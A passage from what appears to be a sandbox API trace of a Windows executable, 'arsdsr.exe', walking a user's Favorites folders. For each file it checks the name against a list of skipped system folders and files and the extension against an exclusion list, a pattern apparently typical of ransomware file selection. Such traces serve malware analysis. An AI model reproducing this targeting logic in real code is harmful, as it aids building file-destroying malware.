Slice Gallery.url", lpString2=".") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="..") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="...") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="windows") returned -1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$recycle.bin") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="rsa") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="ntuser.dat") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="programdata") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="appdata") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="program files") returned 1 [0134.388] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="program files (x86)") returned 1 [0134.388] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0134.388] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Web Slice Gallery.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" [0134.388] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.388] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.388] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0134.388] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.388] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.389] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.389] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.389] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.389] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.389] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.389] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0134.389] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.389] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="...") returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="windows") returned -1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$recycle.bin") returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="rsa") returned -1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="ntuser.dat") returned -1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="programdata") returned -1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="appdata") returned 1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="program files") returned -1 [0134.389] lstrcmpiW (lpString1="Microsoft Websites", lpString2="program files (x86)") returned -1 [0134.389] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.389] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Microsoft Websites" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0134.389] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.389] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.389] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*" [0134.389] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.395] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.395] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0134.395] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.395] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.395] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2=".") returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="..") returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="...") returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="windows") returned -1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$recycle.bin") returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="rsa") returned -1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="ntuser.dat") returned -1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="programdata") returned -1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="appdata") returned 1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="program files") returned -1 [0134.395] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="program files (x86)") returned -1 [0134.395] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.395] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0134.395] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.395] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.395] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0134.395] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.395] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.396] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2=".") returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="..") returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="...") returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="windows") returned -1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$recycle.bin") returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="rsa") returned -1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="ntuser.dat") returned -1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="programdata") returned -1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="appdata") returned 1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="program files") returned -1 [0134.396] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="program files (x86)") returned -1 [0134.396] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.396] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0134.396] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.396] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.396] PathFindExtensionW (pszPath="IE site on Microsoft.com.url") returned=".url" [0134.396] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.396] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.396] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0134.396] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2=".") returned 1 [0134.396] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="..") returned 1 [0134.396] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="...") returned 1 [0134.396] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="windows") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$recycle.bin") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="rsa") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="ntuser.dat") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="programdata") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="appdata") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="program files") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="program files (x86)") returned -1 [0134.397] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.397] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0134.397] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.397] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.397] PathFindExtensionW (pszPath="Microsoft At Home.url") returned=".url" [0134.397] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.397] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.397] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2=".") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="..") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="...") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="windows") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$recycle.bin") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="rsa") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="ntuser.dat") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="programdata") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="appdata") returned 1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="program files") returned -1 [0134.397] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="program files (x86)") returned -1 [0134.397] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.398] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Work.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" [0134.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.398] PathFindExtensionW (pszPath="Microsoft At Work.url") returned=".url" [0134.398] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.398] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.398] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2=".") returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="..") returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="...") returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="windows") returned -1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$recycle.bin") returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="rsa") returned -1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="ntuser.dat") returned -1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="programdata") returned -1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="appdata") returned 1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="program files") returned -1 [0134.398] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="program files (x86)") returned -1 [0134.398] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0134.398] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft Store.url" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" [0134.398] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.398] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.399] PathFindExtensionW (pszPath="Microsoft Store.url") returned=".url" [0134.399] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0134.399] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0134.399] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0134.399] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.400] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2=".") returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="..") returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="...") returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="windows") returned -1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="$recycle.bin") returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="rsa") returned -1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="ntuser.dat") returned -1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="programdata") returned -1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="appdata") returned 1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="program files") returned -1 [0134.400] lstrcmpiW (lpString1="MSN Websites", lpString2="program files (x86)") returned -1 [0134.400] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0134.400] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="MSN Websites" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites" [0134.400] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.400] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0134.400] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*" [0134.400] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0134.402] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.402] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 